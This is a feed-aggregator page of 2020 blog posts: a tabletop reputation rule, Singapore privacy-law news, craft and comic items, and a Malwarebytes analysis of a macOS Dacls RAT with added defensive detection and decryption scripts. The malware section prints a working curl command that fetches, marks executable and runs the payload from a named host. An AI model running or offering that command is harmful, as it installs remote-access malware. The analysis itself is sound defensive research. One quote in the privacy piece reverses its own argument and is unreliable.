Feed aggregator

Reputation for Sentinels of Echo City

The Splintered Realm - Thu, 05/07/2020 - 17:16

I am working on the first setting supplement, for Boondock's Hideaway, and was thinking about how helpful it would be to have a 'rating' for how well a hero or villain is known. I started tinkering, and came up with a system I like and will be play testing - this is not "official" yet, but an official set of rules will be with the first supplement in this series. Feedback is most welcome!
It’s a negative or positive value that reflects how well known a character is. While CHA is your ability to use your personal charm and influence, reputation is your larger popularity in the game world.
Reputation ranges from -20 to +20. It is used as a check in any situation where you might get a public response to your name. Every time you do something that might affect your reputation, attempt a 1d20 check. If you roll on the OPPOSITE side of your reputation in the relevant direction, it moves 1 point that way. When you do something good, you want to roll above your current reputation. It is hard to maintain a strong reputation in either direction; if you want to be greatly feared, you better not accidentally help someone out - you might get caught on camera and have people say nice things about you. A 20 always ‘succeeds’ (moving in the direction of the check) and a 1 always ‘fails’, moving you towards reputation 0. Villains do bad stuff and want a 20 to get 'more negative' in their reputation, and heroes do good stuff and want a 20 to get 'more betterer' in their reputation. Or something like that.
For example, as a new hero, you have a reputation of 0. You rescue a kitty from a tree. The old lady who you helped immediately posts on social media (yeah, old ladies have Facebook, too.) You attempt a check, with a target of rolling over a 0. As long as you don’t roll a 1, you succeed; good news, 95% of the time you are at reputation 1. After several adventures, your reputation is now 7. You are rocking it. Unfortunately, you get some bad press when you get into a fight with Mr. Awesome (it was a misunderstanding that you totally worked out). Unfortunately, Twitter doesn’t see it that way; You roll 1d20, and you want to avoid rolling below your current reputation; if you roll 6 or less, your reputation drops 1 point; a roll of 7 or better doesn’t help you (because this is a ‘negative’ reputation check) but at least the only fallout from the fight is literal fallout from the thermonuclear device that was set off over the Pacific (it was a BIG misunderstanding). 
Reputation in Play
Reputation allows you to make a reaction check when you aren’t there, or when your name alone is being used in some context, but you are not the one making a CHA check. In many situations, you are trying a reputation check before a CHA check. “You’ve never heard of Magnet Master? Oh. Well, look guys… if you could help me out this time, I’d really appreciate it…”
You attempt a check based on your reputation rating. While a reputation of 1 is going to make it unlikely for something special to happen, a reputation of 10+ is going to be helpful. Reputation also works for epic checks; with reputation 14+, you can do amazing things. “Because Lord Wrack threatened to attack the America’s Day Parade, we are canceling the whole thing - and all parades forever until he is in prison.”... “Normally, we don’t just hand out F-16s to civilians, but you are Doc Stalwart after all…”
The default reputation for existing characters would be level x3. Therefore, Lord Wrack, as a villain 5, starts your game at -15 reputation, and he's trying really, really hard to get to -20.

New Talent: Popular
You start with 1d4+2 reputation. You score a critical success on a reputation check with a roll of 19 or 20, and you may attempt a Feat to avoid reputation loss when you roll a botch on a reputation check. You automatically receive +1 reputation every time you level up.

Data privacy law updates eyed by Singapore

Malwarebytes - Thu, 05/07/2020 - 15:15

In early 2019, Singapore’s data privacy regulators proposed that the country’s data privacy law could use two new updates—a data breach notification requirement and a right of data portability for the country’s residents.

The proposed additions are commonplace in several data privacy laws around the world, including, most notably, the European Union General Data Protection Regulation, or GDPR, a sweeping set of data protections that came into effect two years ago.

If Singapore approves its two updates, it would be the latest country in a long line of other countries to align their own data privacy laws with GDPR.

The appeal is clear: Countries that closely hew their own data privacy laws to GDPR have a better shot at obtaining what is called an “adequacy determination” from the European Commission, meaning those countries can legally transfer data between themselves and the EU.

Such a data transfer regime is key to engaging in today’s economy, said D. Reed Freeman Jr., cybersecurity and privacy practice co-chair at the Washington, D.C.-based law firm Wilmer Cutler Pickering Hale and Dorr. If anything, the proposed appeal to GDPR is as much an economic decision as it is one of data privacy rights.

“The world’s economy depends on data flows, and the more restrictive the data flows are, the better,” Freeman said. “Multinational [organizations] in Singapore would like to have an adequacy determination.”

Singapore’s Personal Data Protection Act

On October 15, 2012, Singapore passed its data protection law, the Personal Data Protection Act (PDPA), putting into place new rules for the collection, use, and disclosure of personal data. The PDPA did two other things. It created a national “Do Not Call” register and it established the country’s primary data protection authority, the Personal Data Protection Commission.

For years, the Personal Data Protection Commission has issued warnings to organizations that violate the country’s data protection law, publishing their decisions for the public to read. It is the same commission responsible for the current attempts to update the law.

Today, Singaporeans enjoy some of the same data protection rights found in the European Union and even in California.

For starters, Singaporeans have the right to request that an organization hand over any personal data that belongs to them. Further, Singaporeans also have the right to correct that personal data should they find any errors or omissions.

Singapore’s data privacy law also includes restrictions for how organizations collect, use, or disclose the personal data of Singaporeans.

According to the PDPA, organizations must obtain “consent” before collecting, using, or disclosing personal data (more on that below). Organizations must also abide by “purpose” limitations, meaning that they can “collect, use or disclose personal data about an individual only for purposes that a reasonable person would consider appropriate in the circumstances and, if applicable, have been notified to the individual concerned.” Organizations must notify individuals about planned collection, use, and disclosure of personal data, and collected personal data must be accurate.

Further, any personal data in an organization’s possession must be protected through the implementation of “reasonable security arrangements to prevent unauthorized access, collection, use, disclosure, copying, modification, disposal or similar risks.” And organizations also have to “cease to retain” documents that contain personal data, or “remove the means by which the personal data can be associated with particular individuals” after the purpose for collecting personal data ends.

While these rules sound similar to GDPR, there are discrepancies—including how Singapore and the EU approach “consent.” In Singapore’s PDPA, consent is not required to collect personal data when that data is publicly available, is necessary for broadly defined “evaluative purposes,” or collected solely for “artistic or literary purposes.” In the EU, there are no similar exceptions.

Two other areas where the laws differ are, of course, data portability and data breach notification requirements. Singapore’s law has none.

Proposed data privacy additions

On February 25, 2019, Singapore’s Personal Data Protection Commission published a “discussion paper” on data portability, explaining the benefits of adding a data portability requirement to the PDPA.

“Data portability, whereby users are empowered to authorize the movement of their personal data across organizations, can boost data flows and support greater data sharing in a digital economy both within and across sectors,” the PDPC said in a press release.

With a right to data portability, individuals can request that organizations hand over their personal data in a format that lets them easily move it to another provider and basically plug it in for immediate use. Think of it like taking your email contacts from one email provider to another, but on a much larger scale and with potentially less value; it’s not like your Facebook status updates from 2008 will do you much good on Twitter today.

Less than one week after publishing its data portability discussion paper, the Personal Data Protection Commission also announced plans to add a data breach notification requirement to the PDPA.

The Personal Data Protection Commission proposed that if organizations suffered a data breach that potentially harmed individuals, those individuals and the PDPC itself would need to be notified. Further, even if a data breach brought no potential harm to individuals, organizations would need to notify the PDPC if more than 500 people’s personal data was affected.

Following public consultations, the data portability requirement was well-received.

Why attempt data privacy updates now?

Aligning a country’s data protection laws with the protections provided in GDPR is nothing new, and in fact, multiple countries around the world are currently engaged in the same process. But Singapore’s timing could potentially be further pinned down to another GDPR development in early January of 2019—an adequacy determination granted by the European Commission to another country, Japan.

Wilmer Hale’s Freeman said it is likely that Singapore looked to Japan and wanted the same.

“[Singapore] is competing in the Asia market and in the global market, and I would suspect that the leaders in Singapore saw what happened in Japan, asked the relevant people at the Commission, ‘What do we need to do to get that?’ and were told ‘If you line up [PDPA] pretty close, we have a good chance of getting an adequacy determination.’” Freeman said.

Freeman explained that, in recent history, obtaining an adequacy determination relies on whether a country’s data protection laws are similar to GDPR.

“Over time, it’s been sort of short-hand thought of as ‘adequacy’ means something close to ‘equivalent,’” Freeman said.

As to the importance, Freeman explained that any multinational business that wants to move personal data between its home country and the EU must have a lawful transfer mechanism under GDPR. An adequacy determination is the cleanest one; without it, transfers fall back on narrower, contract-by-contract instruments such as standard contractual clauses, and the business's ability to take part in the world’s economy is constrained accordingly.

“If you’re a multinational company and you have employees and customers in Europe, and you want to store the data at the home office in Singapore, you need a lawful basis to do that,” Freeman said. An adequacy determination is that legal basis, Freeman said, and it’s far more difficult to “undo” an adequacy determination than it is a bilateral agreement, like the one struck down by the Court of Justice for the European Union between the EU and the United States.

Don’t reinvent the data privacy wheel

Singapore has not proposed a time frame for when it wants to finalize the data portability rights and data breach notification requirements. Nor has it specified the actual regulations it would put in place—including how long before the Personal Data Protection Commission would enforce the new requirements, or what those enforcement actions would entail.

Freeman suggested that when the Singaporean government clarifies its proposals, it look to its neighbors across the world who have grappled with the same questions on data breach notifications and data portability.

For data portability, Freeman explained that many large corporations have already struggled to comply with the rules both in GDPR and in the California Consumer Privacy Act, not because of an inability to do so, but because providing such in-depth data access to individuals requires understanding all the places where an individual’s personal data can live.

“Is it stored locally? On servers in different places? Is it in email? In instant messaging? On posts?” Freeman said.

For data breach notification requirements, Freeman also said that it makes little sense to create something “out of whole cloth” that will create new burdens on multinational businesses that already have to comply with the data breach notification requirements in GDPR and in the 50 US states.

It’s better to find what currently works, Freeman said, and borrow.

The post Data privacy law updates eyed by Singapore appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Crafty Mother’s Day Gifts: 50+ Free Patterns to Crochet, Knit, and Sew

Moogly - Thu, 05/07/2020 - 15:00

Crafty Mother’s Day gift ideas are always appreciated – and there are tons of great crochet, knit, and sewing patterns free on Yarnspirations! I’ve highlighted some that you don’t want to miss, and added a few free Moogly patterns too! Disclaimer: This post is sponsored by Yarnspirations. First, get all the main links. Then see...


The post Crafty Mother’s Day Gifts: 50+ Free Patterns to Crochet, Knit, and Sew appeared first on moogly. Please visit www.mooglyblog.com for this post. If you are viewing this on another site they have scraped the content from my website without permission. Thank you for your support.

Categories: Crochet Life

REVIEW CORNER: Super Duck # 1

First Comics News - Thu, 05/07/2020 - 14:11

“Super Duck # 1” (2020)

Writers: Frank Tieri & Ian Flynn
Artist: Ryan Jampole
Colorist: Matt Herms
Letterer: Jack Morelli


I guess that I can’t leave those darn anthropomorphic characters alone, can I?! Well, it looks like this week I’ll take a look at Super Duck # 1 from the good folks at Archie Comics. When I read this, I have to say that it was very entertaining; think “Ducktales” mixed with the spirit of Superman, along with a good dose of Deadpool thrown in for good measure. I really love how the book kicks off with the standard yet classic opening of the hero fighting his number one arch-nemesis; in this case, Super Duck’s main villain is Dapper Duck (who’s a perfect parody of the pre-Crisis Lex Luthor), and you’ll enjoy the action sequences that incorporate the comedic elements that really bring the story alive. For his part, Frank Tieri brings the humor that he showcased on his “Harley Quinn” run as well as his “Old Lady Harley” miniseries, and it works perfectly with a character such as Super Duck. I also have to add that I love that his powers come from taking “Super Vitamins” (that plot device will be played out in this miniseries). This series is just so fun and silly when it comes to poking fun at the whole superhero genre that you’ll find yourself rooting for Super Duck or wondering if he’ll get his act together (he can be a little egotistical). This is a comic that should be on anyone’s radar, and it wouldn’t surprise me if Super Duck comes back for an ongoing series thanks to the enthusiasm on display in this first issue.

Next week I’ll keep “Review Corner” going with another review, so be on the lookout for that, and I’ll see you all next time.

Categories: Comic Book Blogs


First Comics News - Thu, 05/07/2020 - 13:58


BURBANK, CA – May 7, 2020 – The ultimate destination for DC fans, DC UNIVERSE, unveiled a new program today, DC Universe Rewards. Running from May 7 through the fall, the program is designed to reward fans for doing what they already love – diving deep into their fandom. Giving all fans – not just service subscribers – the opportunity to participate in select options, the DC Universe Rewards program features can’t-miss items and exclusive releases, all at no cost.

An authentic celebration of fandom, DC Universe Rewards will enable users to earn special tokens for ongoing engagement and participation on DC UNIVERSE, including the free-to-all Community section, editorial features and “DC Daily.” These tokens are redeemable for an amazing set of rewards, from a 30-day premium subscription to DC UNIVERSE to ultra-exclusive collectibles such as a special, limited edition Harley Quinn Super-Villains pin set.  DC Universe Rewards will offer new earn opportunities and rewards each week.

Fans can earn tokens and “level up” simply by doing what they already love. Whether it’s subscribers finishing a DC digital comic, watching an entire DC movie or TV episode, or even non-subscribers and subscribers alike interacting with other fans on the DC UNIVERSE community boards, there are various opportunities for fans to accumulate tokens that can be redeemed for rewards.

All participants need to do is register for free on DC UNIVERSE and select a customized avatar. Then they can start earning tokens redeemable for rewards by navigating to the rewards program in the MyDC section of DC UNIVERSE or clicking/tapping on REWARDS in the menu.

Below are prizes currently available with the official launch of DC Universe Rewards, with more continuously rolling out throughout the program:

  • DC Universe 30-day Premium Subscription
  • DCU Exclusive HARLEY QUINN Super-Villains Pin Set
  • DC Universe Exclusive Harley Quinn Show Statue
  • DC Artists Alley Batgirl (White & Gold) by Sho Murase Designer Vinyl
  • Digital Movie Redemption via Movies Anywhere
  • DC Universe Exclusive Limited Edition TITANS Poster
  • DC Universe Exclusive Limited Edition DOOM PATROL Poster
  • DC Universe Meta Madhouse Lex Luthor Masterminds T-shirt
  • DC Universe Meta Madhouse Darkseid Invaders T-shirt
  • DC Universe Meta Madhouse The Cheetah Beasts T-shirt
  • DC Universe Exclusive Batcave Wallpapers
  • DC Universe Exclusive Fortress of Solitude Wallpapers
  • Shop DC $5 Off Purchase
  • Shop DC $10 Off Purchase
  • Shop DC $25 Off Purchase

Plus, DC Universe Exclusive rewards tied to the upcoming debut of STARGIRL, DOOM PATROL Season Two and much more – coming soon!

Categories: Comic Book Blogs

The Thundarr Roadtrip

Sorcerer's Skull - Thu, 05/07/2020 - 11:00

I ran across a podcast yesterday that is reviewing the episodes of Thundarr the Barbarian in a way that sensibly traces Thundarr and crew's travels across post-apocalyptic North America and beyond. It's called, appropriately, Thundarr Road.

The Sheldon Mayer Estate Featuring Sugar and Spike & Many of His Earliest Works Sell for $284,452 

First Comics News - Thu, 05/07/2020 - 07:37

LOS ANGELES, May 6, 2020 – The Sheldon Mayer collection, featuring “Sugar and Spike” comic strips, was auctioned for $284,452 last Thursday by Nate D. Sanders Auctions.

The highest price realized was an Original “Scribbly” artwork from September 1939, which sold for $29,845. These iconic four pages of Scribbly appeared as four complete stories in the #6 issue, chronicling Scribbly Jibbet’s journey of getting hired as a 13 1/2 year old boy cartoonist, a storyline based on Mayer’s own experiences in the comic book industry during the early 1930s.

Categories: Comic Book Blogs


Looking For Group - Thu, 05/07/2020 - 04:00

The post 1398 appeared first on Looking For Group.

Categories: Web Comics

Moogly Live May 6, 2020 – Answering Your Questions!

Moogly - Wed, 05/06/2020 - 16:07

Let’s chat today! On this Facebook Live, it’s the usual Moogly updates – the latest projects, a couple sneak peeks, and the latest Moogly news! Then, follow me over to YouTube where I’ll be answering any questions you have on crochet, knitting, and crafts! Disclaimer: This post is sponsored by Yarnspirations, and contains affiliate links....


The post Moogly Live May 6, 2020 – Answering Your Questions! appeared first on moogly.

Categories: Crochet Life

New Mac variant of Lazarus Dacls RAT distributed via Trojanized 2FA app

Malwarebytes - Wed, 05/06/2020 - 15:59

This blog post was authored by Hossein Jazi, Thomas Reed and Jérôme Segura.

We recently identified what we believe is a new variant of the Dacls Remote Access Trojan (RAT) associated with North Korea’s Lazarus group, designed specifically for the Mac operating system.

Dacls is a RAT that was discovered by Qihoo 360 NetLab in December 2019 as a fully functional covert remote access Trojan targeting the Windows and Linux platforms.

This Mac version is at least distributed via a Trojanized two-factor authentication application for macOS called MinaOTP, mostly used by Chinese speakers. Similar to the Linux variant, it boasts a variety of features including command execution, file management, traffic proxying and worm scanning.


On April 8th, a suspicious Mac application named “TinkaOTP” was submitted to VirusTotal from Hong Kong. It was not detected by any engines at the time.

The malicious bot executable is located in the application’s “Contents/Resources/Base.lproj/” directory and pretends to be a nib file (“SubMenu.nib”) while actually being a Mach-O executable. It contains the strings “c_2910.cls” and “k_3872.cls”, the names of the certificate and private key files that had been observed previously.


This RAT persists through LaunchDaemons or LaunchAgents, which take a property list (plist) file specifying the program launchd should start after reboot. The difference between the two is that LaunchAgents run code on behalf of the logged-in user while LaunchDaemons run code as root.

When the malicious application starts, it creates a plist file named “com.aex-loop.agent.plist” under the “Library/LaunchDaemons” directory. The contents of the plist file are hardcoded within the application.

The program also checks whether “getpwuid(getuid())” returns the user ID of the current process. If a user ID is returned, it creates the same “com.aex-loop.agent.plist” under the LaunchAgents directory, “Library/LaunchAgents/”, so the RAT leaves a user-level persistence entry alongside the system-level one.

Figure 1: Plist file

The file name and directory used to store the plist are kept as hex strings that are decoded and concatenated at run time; the decoded strings read backwards, so the filename and directory have to be reversed to recover them.
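The persistence described above gives a defender something concrete to look for on disk. The following Python triage script is an added example, not code from Malwarebytes or from the sample: it walks the standard launchd directories and flags plists that carry the "com.aex-loop.agent" label, launch a hidden dot-file under a Library folder (the ".mina" path seen in the curl variant), or point at a "nib" resource in "Base.lproj" (the SubMenu.nib disguise). The embedded plist is a constructed sample modelled on the article's description, and the heuristics are this example's own.

```python
import plistlib
from pathlib import Path

# Label, file names and locations come from the write-up; the heuristics are this example's own.
KNOWN_BAD_LABELS = {"com.aex-loop.agent"}
PERSISTENCE_DIRS = [
    Path("/Library/LaunchDaemons"),
    Path("/Library/LaunchAgents"),
    Path.home() / "Library" / "LaunchAgents",
]


def triage_plist(data: bytes) -> list:
    """Return the reasons a launchd plist looks like Dacls persistence (empty list = nothing found)."""
    try:
        plist = plistlib.loads(data)
    except Exception as exc:  # malformed XML or binary plist
        return [f"unparseable plist: {exc}"]
    if not isinstance(plist, dict):
        return ["top-level object is not a dict"]
    reasons = []
    label = plist.get("Label", "")
    if label in KNOWN_BAD_LABELS:
        reasons.append(f"known Dacls label {label!r}")
    args = plist.get("ProgramArguments") or []
    targets = [plist.get("Program")] + list(args)
    for part in filter(None, targets):
        name = Path(part).name
        # the curl variant drops the bot as a hidden dot-file under ~/Library (.mina)
        if "/Library/" in part and name.startswith("."):
            reasons.append(f"hidden executable under a Library folder: {part}")
        # the Trojanized bundle hid its executable as SubMenu.nib inside Base.lproj
        if name.endswith(".nib") or "/Base.lproj/" in part:
            reasons.append(f"launch target disguised as a nib resource: {part}")
    return reasons


def scan_dirs(dirs=PERSISTENCE_DIRS) -> dict:
    """Triage every *.plist in the launchd directories; returns {path: reasons}."""
    findings = {}
    for d in dirs:
        if not d.is_dir():
            continue
        for p in d.glob("*.plist"):
            try:
                reasons = triage_plist(p.read_bytes())
            except OSError:
                continue
            if reasons:
                findings[str(p)] = reasons
    return findings


# Constructed sample modelled on the article's description (label and .mina path); not the real plist.
SAMPLE_DACLS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key><string>com.aex-loop.agent</string>
    <key>ProgramArguments</key>
    <array><string>/Users/victim/Library/.mina</string></array>
    <key>RunAtLoad</key><true/>
    <key>KeepAlive</key><true/>
</dict>
</plist>
"""

if __name__ == "__main__":
    for path, why in scan_dirs().items():
        print(path, "->", "; ".join(why))
```

Run it as the logged-in user to cover ~/Library/LaunchAgents and with sudo to read /Library/LaunchDaemons; a hit on the label alone is high confidence, while the dot-file and nib heuristics are worth a manual look rather than automatic quarantine.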

Figure 2: Directory and file name generation

Config File

The config file contains the information about the victim’s machine such as Puid, Pwuid, plugins and C&C servers. The contents of the config file are encrypted using the AES encryption algorithm.

Figure 3: Load config

Both the Mac and Linux variants use the same AES key and IV, in CBC mode, to encrypt and decrypt the config file. Because key and IV are hardcoded and shared, the config of any sample can be decrypted offline once they have been recovered from the binary.

Figure 4: AES Key and IV

The config file location and name are stored in hex format within the code. The name of the config file pretends to be a database file related to the Apple Store:


Figure 5: Config file name

The “IntializeConfiguration” function initializes the config file with the following hardcoded C&C servers.

Figure 6: Initialize config file

The config file is constantly updated by commands received from the C&C server. The application name after installation is “mina”, taken from MinaOTP, the two-factor authentication app for macOS that the Trojan impersonates.

Figure 7: Config file is being updated

Main Loop

After initializing the config file, the main loop is executed to perform the following four main commands:

  • Upload C&C server information from the config file to the server (0x601)
  • Download the config file contents from the server and update the config file (0x602)
  • Upload collected information from the victim’s machine by calling “getbasicinfo” function (0x700)
  • Send heartbeat information (0x900)

The command codes are exactly the same as Linux.dacls.

Figure 8: Main Loop

Plugins

This Mac RAT has all six plugins seen in the Linux variant plus an additional plugin named “SOCKS”. This new plugin proxies network traffic from the victim to the C&C server.

The app loads all seven plugins at the start of the main loop. Each plugin has its own section in the config file, which is loaded when the plugin is initialized.

Figure 9: Plugins loaded

CMD plugin

The cmd plugin is similar to the “bash” plugin in the Linux RAT: it receives and executes commands by providing a reverse shell to the C&C server.

Figure 10: Cmd Plugin

File Plugin

The file plugin has the capability to read, delete, download, and search files within a directory. The only difference between the Mac and Linux version is that the Mac version does not have the capability to write files (Case 0).

Figure 11: File plugin

Process plugin

The process plugin can kill and run processes, get process IDs and collect process information.

Figure 12: Process Plugin

If the “/proc/%d/task” directory of a process is accessible (where %d is the process ID), the plugin obtains the following information. Note that macOS has no procfs, so this code path, carried over from the Linux build, yields nothing on a Mac:

  • Command line arguments of the process, read from “/proc/%d/cmdline”
  • Name, Uid, Gid, PPid of the process, from the “/proc/%d/status” file.

Test plugin

The code for the Test plugin between Mac and Linux variant is the same. It checks the connection to an IP and Port specified by the C&C servers.

RP2P plugin

The RP2P plugin is a proxy server used to avoid direct communications from the victim to the actor’s infrastructure.

Figure 13: Reverse P2P

LogSend plugin

The Logsend plugin contains three modules that:

  • Check connection to the Log server
  • Scan network (worm scanner module)
  • Execute long run system commands
Figure 14: Logsend Plugin

This plugin sends the collected logs using HTTP POST requests.

Figure 15: User Agent

An interesting function in this plugin is the worm scanner. “start_worm_scan” scans a network subnet on ports 8291 or 8292. The subnet to scan is chosen by a set of predefined rules; the following diagram shows the selection process.
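A host sweeping its subnet on 8291/8292 is noisy, and that noise is the defender's handle on this plugin. The detection below is an added example (not part of the Malwarebytes analysis): it reads flow records, keeps only TCP connections to the two ports the article names, and flags any source that reaches a large number of distinct destinations within a short window, which separates a sweep from routine management traffic. The "ts src dst dport proto" record format and the sample records are constructed for the example; the threshold and window are assumptions to tune per network.

```python
from collections import defaultdict

WORM_PORTS = {8291, 8292}  # the ports the article says start_worm_scan probes


def parse_flow(line: str):
    """Parse one 'ts src dst dport proto' record (a format constructed for this example)."""
    ts, src, dst, dport, proto = line.split()
    return float(ts), src, dst, int(dport), proto.lower()


def find_scanners(lines, ports=WORM_PORTS, min_targets=16, window=60.0) -> dict:
    """Return {src: peak_distinct_destinations} for sources that contacted at least
    `min_targets` distinct hosts on `ports` within any `window`-second span.
    A sliding window over each source's sorted events avoids flagging slow, legitimate
    management traffic that touches a handful of devices per hour."""
    events = defaultdict(list)
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport, proto = parse_flow(line)
        if proto == "tcp" and dport in ports:
            events[src].append((ts, dst))
    hits = {}
    for src, evs in events.items():
        evs.sort()
        start, peak = 0, 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            peak = max(peak, len({dst for _, dst in evs[start:end + 1]}))
        if peak >= min_targets:
            hits[src] = peak
    return hits


# Constructed sample telemetry (not real data): one host sweeps .1-.40 on 8291 in 40 seconds,
# another touches a single router twice, a third talks HTTPS and is irrelevant.
SAMPLE_FLOWS = ["# ts src dst dport proto"]
SAMPLE_FLOWS += [f"{1000 + i} 192.168.1.20 192.168.1.{i + 1} 8291 tcp" for i in range(40)]
SAMPLE_FLOWS += [
    "1010 192.168.1.7 192.168.1.1 8291 tcp",
    "1700 192.168.1.7 192.168.1.1 8291 tcp",
    "1500 192.168.1.9 10.0.0.1 443 tcp",
]

if __name__ == "__main__":
    print(find_scanners(SAMPLE_FLOWS))  # {'192.168.1.20': 40}
```

Feeding it real NetFlow or firewall logs only requires replacing parse_flow; the window logic is independent of the record format.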

Figure 16: Worm Scan

Socks plugin

The Socks plugin is the new, seventh plugin added to this Mac RAT. Like the RP2P plugin, it acts as an intermediary that relays traffic between the bot and the C&C infrastructure, using SOCKS4 for its proxy communications.
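The article says only that the plugin speaks SOCKS4, so the exchange below is written from the public SOCKS4/4a specification rather than recovered from the sample; it is an added example, not Malwarebytes' or the malware's code. It builds and parses both sides of a CONNECT handshake (bot request, proxy reply), which is what a network analyst needs to pull destination host and port out of the relayed traffic, or to stand up a decoy proxy. The destination address and the policy callback are constructed for the example.

```python
import ipaddress
import struct

# SOCKS4 wire format (public spec; the sample's exact framing is not described in the article).
#   request : VN=4 | CD (1=CONNECT, 2=BIND) | DSTPORT (2, big-endian) | DSTIP (4) | USERID ... NUL
#   SOCKS4a : DSTIP = 0.0.0.x (x != 0) and a NUL-terminated hostname follows USERID
#   reply   : VN=0 | CD (0x5A granted, 0x5B/0x5C/0x5D rejected) | DSTPORT (2) | DSTIP (4)
GRANTED, REJECTED = 0x5A, 0x5B


def build_connect(dest: str, port: int, userid: bytes = b"") -> bytes:
    """Client side: CONNECT to `dest` (dotted IPv4, or a hostname via SOCKS4a)."""
    try:
        ip, tail = ipaddress.IPv4Address(dest).packed, b""
    except ipaddress.AddressValueError:
        ip, tail = b"\x00\x00\x00\x01", dest.encode("ascii") + b"\x00"
    return struct.pack("!BBH4s", 4, 1, port, ip) + userid + b"\x00" + tail


def parse_request(buf: bytes):
    """Parse a SOCKS4/4a request; None means malformed or not yet complete."""
    if len(buf) < 9 or buf[0] != 4:
        return None
    _, cd, port, ip = struct.unpack("!BBH4s", buf[:8])
    nul = buf.find(b"\x00", 8)  # USERID terminator; search only after the fixed header
    if nul < 0:
        return None
    dest = str(ipaddress.IPv4Address(ip))
    if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:  # SOCKS4a: hostname after the USERID
        end = buf.find(b"\x00", nul + 1)
        if end < 0:
            return None
        dest = buf[nul + 1:end].decode("ascii", "replace")
    cmd = {1: "connect", 2: "bind"}.get(cd, f"unknown({cd})")
    return {"cmd": cmd, "port": port, "dest": dest, "userid": buf[8:nul]}


def build_reply(granted: bool, port: int = 0, ip: str = "0.0.0.0") -> bytes:
    return struct.pack("!BBH4s", 0, GRANTED if granted else REJECTED, port,
                       ipaddress.IPv4Address(ip).packed)


def parse_reply(buf: bytes):
    if len(buf) < 8 or buf[0] != 0:
        return None
    _, cd, port, ip = struct.unpack("!BBH4s", buf[:8])
    return {"granted": cd == GRANTED, "code": cd, "port": port,
            "ip": str(ipaddress.IPv4Address(ip))}


def proxy_handshake(client_request: bytes, allow) -> bytes:
    """Server side of the exchange: parse, consult allow(dest, port), answer."""
    req = parse_request(client_request)
    if req is None or req["cmd"] != "connect":
        return build_reply(False)
    return build_reply(bool(allow(req["dest"], req["port"])), req["port"])


if __name__ == "__main__":
    # constructed exchange: the bot asks the proxy for 203.0.113.10:443 (a TEST-NET address)
    req = build_connect("203.0.113.10", 443, userid=b"bot")
    print(parse_request(req))
    print(parse_reply(proxy_handshake(req, lambda d, p: p == 443)))
```

SOCKS4 has no authentication beyond the free-form USERID and carries the destination in clear, so once the outer TLS session is terminated the proxied destination is fully visible to whoever holds that end.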

Figure 17: Socks4

Network Communications

C&C communication in this Mac RAT is similar to the Linux variant. To connect to the server, the application first establishes a TLS connection, then performs beaconing, and finally encrypts the data it sends inside the TLS channel a second time with the RC4 algorithm.

Figure 18: Traffic generated by the Application (.mina)

Figure 19: TLS connection

Both the Mac and Linux variants use the wolfSSL library for TLS. wolfSSL is an open-source TLS implementation in C that supports multiple platforms, and it has been used by several threat actors; for example, Tropic Trooper used this library in its KeyBoy malware.

Figure 20: WolfSSL

Beaconing uses the same command codes as Linux.dacls; the exchange confirms the identity of the bot to the server and vice versa.

Figure 21: Beaconing

The RC4 key is derived from a hard-coded key.
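Once the hard-coded key material has been lifted from the binary, the inner layer of the traffic can be stripped offline from a TLS-terminated capture. The block below is an added example, not code from the article or from the sample: a pure-Python RC4 checked against the published test vectors, plus a helper that shows why a fixed key is a weakness for the operator as well. DEMO_KEY is an assumption standing in for the real key, and the assumption that each record starts a fresh keystream is this example's, not something the article states.

```python
# DEMO_KEY is a placeholder for illustration; the real key must be recovered from the binary.
DEMO_KEY = b"example-hardcoded-key"


def rc4_keystream(key: bytes):
    """Yield RC4 keystream bytes: key-scheduling (KSA), then the PRGA loop."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt; RC4 is its own inverse."""
    return bytes(b ^ k for b, k in zip(data, rc4_keystream(key)))


def known_answer_ok() -> bool:
    """Verify the primitive against the published RC4 test vectors before trusting it on captures."""
    return (rc4(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"
            and rc4(b"Wiki", b"pedia").hex() == "1021bf0420")


def decrypt_records(key: bytes, records):
    """Decrypt captured post-TLS records, assuming (example assumption) each one
    starts from the beginning of the keystream."""
    return [rc4(key, r) for r in records]


def keystream_reuse_leak(c1: bytes, c2: bytes) -> bytes:
    """With a fixed key and no per-message nonce, every record is XORed with the same
    keystream, so c1 XOR c2 equals p1 XOR p2: the keystream cancels out and known command
    codes (0x601, 0x602, 0x700, 0x900) become cribs for recovering the other record."""
    return bytes(a ^ b for a, b in zip(c1, c2))


if __name__ == "__main__":
    assert known_answer_ok()
    # constructed records; the leading bytes stand in for the command-code field
    p1, p2 = b"\x06\x01 constructed record one", b"\x09\x00 constructed record two"
    c1, c2 = decrypt_records(DEMO_KEY, [p1, p2])  # same call encrypts
    print(decrypt_records(DEMO_KEY, [c1, c2]) == [p1, p2])
    print(keystream_reuse_leak(c1, c2)[:2].hex())  # 0x0601 XOR 0x0900 = "0f01"
```

If decryption of a real capture produces garbage while the known-answer check passes, the likely cause is that the keystream is continuous across records rather than restarted, or that the key derivation step from the hard-coded value has been skipped; both are properties of the sample, not of RC4.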

Figure 22: RC4 Initialization

Variants and detection

We also identified another variant of this RAT which downloads the malicious payload using the following curl command (note the -k flag, which disables TLS certificate verification, so the download succeeds even if the staging host's certificate is invalid):

curl -k -o ~/Library/.mina https://loneeaglerecords.com/wp-content/uploads/2020/01/images.tgz.001 > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev

We believe this Mac variant of the Dacls RAT is associated with the Lazarus group, also known as Hidden Cobra and APT38, an infamous North Korean threat actor that has carried out cyber espionage and cyber-crime operations since 2009.

The group is known to be one of the most sophisticated actors, capable of making custom malware to target different platforms. The discovery of this Mac RAT shows that this APT group is constantly developing its malware toolset.

